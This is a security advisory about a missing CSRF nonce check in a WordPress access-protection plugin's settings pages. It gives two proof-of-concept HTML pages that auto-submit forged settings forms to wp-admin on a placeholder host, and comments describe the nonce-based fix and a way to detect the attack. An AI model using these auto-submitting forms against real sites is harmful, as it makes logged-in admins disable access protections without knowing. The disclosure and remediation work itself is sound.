The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack and disable the applied protection.
<!--
  Proof of concept from the advisory: a cross-site page that POSTs the plugin's
  general-settings form to wp-admin on the target site (example.com is a placeholder).
  The form carries no WordPress nonce field; per the advisory the plugin does not check
  for one, so the request is processed under the logged-in admin's session.

  Plugin-side fix: emit a nonce in the settings form with wp_nonce_field() and verify it
  with check_admin_referer() (together with a current_user_can() check) before saving.
  Detection: POST requests to this admin page whose Origin/Referer is not the site itself.

  Field names and values are the advisory author's; their exact effect inside the plugin
  is not shown on this page.
-->
<form id="test" action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-options" method="POST">
<input type="text" name="capa_protect_show_private_pages" value="on">
<input type="text" name="capa_protect_show_private_categories" value="on">
<input type="text" name="capa_protect_post_policy" value="show message">
<input type="text" name="capa_protect_comment_policy" value="all">
<input type="text" name="capa_protect_show_only_allowed_attachments" value="on">
<input type="text" name="submit" value="Update general settings">
</form>
<script>
// Runs as soon as the script is parsed, so the form is sent without any click.
// The form has a control named "submit", which shadows the form's own submit()
// method; that is why the prototype method is invoked explicitly here.
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>
<!--
  Second proof of concept from the advisory: the same missing-nonce problem on the
  plugin's role-options page (page=capa/capa-roles-page). As with the general settings,
  the form contains no WordPress nonce field.

  Plugin-side fix: add wp_nonce_field() to the role-options form and verify it with
  check_admin_referer() (together with a current_user_can() check) before saving.

  NOTE(review): the numeric values (1, 2, 132) are presumably category/page IDs from the
  author's test site, and the repeated "empty" fields presumably mirror the plugin's own
  form; neither is confirmed by this page.
  NOTE(review): this form reuses id="test", so it appears to be a standalone case
  separate from the general-settings one.
-->
<form id="test" action="https://example.com/wp-admin/admin.php?page=capa%2Fcapa-roles-page" method="POST">
<input type="text" name="empty" value="0">
<input type="text" name="capa_protect_cat[visitor][]" value="1">
<input type="text" name="empty" value="0">
<input type="text" name="capa_protect_pag[visitor][]" value="2">
<input type="text" name="empty" value="0">
<input type="text" name="capa_protect_pag[visitor][]" value="132">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="empty" value="0">
<input type="text" name="submit" value="Update Role Options">
</form>
<script>
// Runs as soon as the script is parsed, so the form is sent without any click.
// The form has a control named "submit", which shadows the form's own submit()
// method; that is why the prototype method is invoked explicitly here.
HTMLFormElement.prototype.submit.call(
document.getElementById("test")
);
</script>